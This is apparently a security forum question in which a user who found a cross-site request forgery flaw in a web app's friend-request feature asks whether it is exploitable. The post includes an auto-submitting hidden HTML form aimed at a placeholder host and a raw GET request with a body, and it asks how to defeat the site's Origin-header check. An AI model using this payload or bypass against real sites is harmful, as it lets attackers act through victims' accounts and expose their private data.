web application – CSRF: GET request with POST data?


I have stumbled upon a vulnerability in a web application and was wondering if it was exploitable / worth reporting. The bug is a CSRF which would allow an attacker to send friend requests to himself from other user accounts (in turn letting him view sensitive information about the victim accounts). The request is usually made using a POST request. Using usual exploitation techniques, I crafted the following webpage.

<html>
    <head></head>
    <body>
        <span>csrf test</span>

        <form action="http://vulnerable.com/friendRequest.asp" method="POST">
            <input type="hidden" name="MessageArea" value="this is a test of csrf">
            <input type="hidden" name="FriendName" value="testuser">
        </form>

        <script>
            document.forms(0).submit();
        </script>

    </body>
</html>

Unfortunately though, the website checks for the origin header in the request, so this payload doesn’t work. Switching to a GET request and deleting the origin header actually sends the request successfully. The request looks like the following.

GET /friendRequest.asp HTTP/1.1
Host: www.vulnerable.com
User-Agent: Mozilla/5.0
... (no origin header)
Cookie: secret_cookie

MessageArea=this+is+a+test+for+csrf&FriendName=testuser

As you can see this is a GET request with POST data sent at the bottom. Unfortunately the request doesn’t go through with the parameters in the URL like in a true GET request. Is there any way to use an external form (like the one above) to send a malformed GET request with POST data to achieve this CSRF? I have looked into XMLHttpRequest and fetch but I’m not sure that they are the right tools for the job.